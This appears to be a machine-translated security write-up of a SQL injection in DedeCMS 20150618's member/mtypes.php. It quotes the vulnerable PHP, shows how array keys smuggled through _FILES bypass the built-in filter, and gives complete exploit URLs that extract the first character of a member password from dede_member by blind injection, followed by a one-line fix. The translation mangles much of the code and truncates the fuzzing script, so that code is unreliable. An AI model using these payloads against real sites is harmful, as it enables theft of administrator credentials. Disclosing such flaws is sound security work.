Dedecms 20150618 inject one (Anti-DDoS injection \ can be injected into the Administrator account)

Dedecms 20150618 inject one (Anti-DDoS injection \ can be injected into the Administrator account)

First, let's take a look.

Function XSSClean ($ val) {global $ export _soft_lang; if ($ export _soft_lang = 'gb2312 ') gb2utf8 ($ val); if (is_array ($ val )) {while (list ($ key) = each ($ val) {if (in_array ($ key, array ('tags', 'body', 'dede _ fields ', 'dede _ addonfields ', 'dopost', 'inserted') continue; $ val [$ key] = XSSClean ($ val [$ key]);} return $ val;} $ val = preg_replace ('/([-,-,-])/', '', $ val); $ search = 'abcdefhijklmnopqrstuvwxy '; $ search. = 'Abcdefghijklmnopqrstuvwxy'; $ search. = '2017! @ # $ % ^ & * () '; $ Search. = '~ '";:? +/= {} []-_ | '\'; For ($ I = 0; $ I <strlen ($ search); $ I ++) {$ val = preg_replace ('/(& # [xX] 0 {0, 8 }'. dechex (ord ($ search [$ I]). ';?) /I ', $ search [$ I], $ val); // with a; $ val = preg_replace ('/('{0, 8 }'. ord ($ search [$ I]). ';?) /', $ Search [$ I], $ val); // with a ;}$ val = str_replace ("'", "'", $ val ); // filter key for value without $ val = str_replace ("'", "'", $ val); // and key without addslashes $ val = str_replace (""", ", $ val); $ val = str_replace (", ", $ val); $ val = str_replace ("(","(", $ val); $ val = str_replace (")", ")", $ val );

Member/mtypes. php


 

Elseif ($ dopost = 'save') {if (isset ($ mtypeidarr) & is_array ($ mtypeidarr) {$ delids = '0 '; $ mtypeidarr = array_filter ($ mtypeidarr, 'is _ numeric '); foreach ($ mtypeidarr as $ delid) {$ delid = HtmlReplace ($ delid); $ delids. = ','. $ delid; unset ($ mtypename [$ delid]);} $ query = "delete from 'dede _ mtypes 'WHERE mtypeid IN ($ delids) AND mid = '$ pai_ml-> M_ID'; "; $ dsql-> ExecNoneQuery ($ query);} foreach ($ mtypena Me as $ id => $ name) // loop out the key of the array {$ name = HtmlReplace ($ name ); // only the value is addslashes, but not the key addslashes. As a result, $ id can be introduced into single quotes, resulting in injection. $ Query = "UPDATE 'dede _ mtypes 'SET mtypename =' $ name' WHERE mtypeid = '$ id' AND mid =' $ pai_ml-> M_ID '"; $ dsql-> ExecuteNoneQuery ($ query);} ShowMsg ('classification modification completed ', 'mtypes. php ');}

So first we register an account and then pass an array because dede is a pseudo global

Then, we can't directly pass the Array. mtypename [aa '] finds that dump is an Array.

The key generated in the loop is. Another method is required here. Refer to the method for passing arrays by menmen519.


 

foreach($_FILES as $_key=>$_value){    foreach($keyarr as $k)    {        if(!isset($_FILES[$_key][$k]))        {            exit('Request Error!');        }    }    if( preg_match('#^(cfg_|GLOBALS)#', $_key) )    {        exit('Request var not allow for uploadsafe!');    }    $$_key = $_FILES[$_key]['tmp_name'];    ${$_key.'_name'} = $_FILES[$_key]['name'];    ${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z./]#i', '', $_FILES[$_key]['type']);    ${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);    if(!empty(${$_key.'_name'}) && (preg_match("#.(".$cfg_not_allowall.")$#i",${$_key.'_name'}) || !preg_match("#.#", ${$_key.'_name'})) )    {

Use _ FILES to create an array.



Another problem is that the anti-injection service has changed ..
 

if (strpos($clean, '@') !== FALSE  OR strpos($clean,'char(')!== FALSE OR strpos($clean,'"')!== FALSE         OR strpos($clean,'$s$$s$')!== FALSE)

Double quotation marks are added before, and we all know that the keyword of ids of 80sec after ''' can be used.

But without @ and ", how can we prevent '''from reporting an error before we embed the select statement.



Without thinking, write a scum script fuzz and run it.


 

 ";echo $b;echo "";echo urlencode($b);}}

 

Only ran out. @ continue to change the script and run again.


 

 ";echo $b;echo "";echo urlencode($b);}}

Only one double quotation mark is found .. These two are filtered out again.



Fortunately, ooxx is here.



WHERE mtypeid = 'A' and '''. ''. mtypeid and



This operation can also be executed, so it successfully bypasses dedecms's anti-injection.



So it can be injected.



_______________________________________________________________________



Demo process



First, a member comes to/member/mtypes. php to create a category.


 

CATEGORY added successfully. If your browser does not respond, click here...

 

Delete? Category id content type category name 1 Common Article www

Note that the category ID is 1 and its name is www.



Then access

Http: // web/new/dedecmsv/member/mtypes. php? Dopost = save & _ FILES [mtypename] [name] =. xxxx & _ FILES [mtypename] [type] = xxxxx & _ FILES [mtypename] [tmp_name] [a' and '''. ''. mtypeid or if (ascii (substr (select pwd from dede_member limit 1),) % 3d51) and mtypeid % 3d1% 23] = w & _ FILES [mtypename] [size] =. xxxx




 

Delete? Category id content type category name 1 Common Article www

Category name not changed



Change it.



Http: // web/new/dedecmsv/member/mtypes. php? Dopost = save & _ FILES [mtypename] [name] =. xxxx & _ FILES [mtypename] [type] = xxxxx & _ FILES [mtypename] [tmp_name] [a' and '''. ''. mtypeid or if (ascii (substr (select pwd from dede_member limit 1),) % 3d50) and mtypeid % 3d1% 23] = w & _ FILES [mtypename] [size] =. xxxx



Back to Category Management after access


 

Delete? Category id content type category name 1 Common Article w

Now that the category name has changed to the value of our array, it means that when the first ascii code of pwd is 50

If this parameter is set to true, it indicates that pwd's first priority is 2.



You can also write another script based on time to run it.
 

 

 

Solution:

Use htmlreplace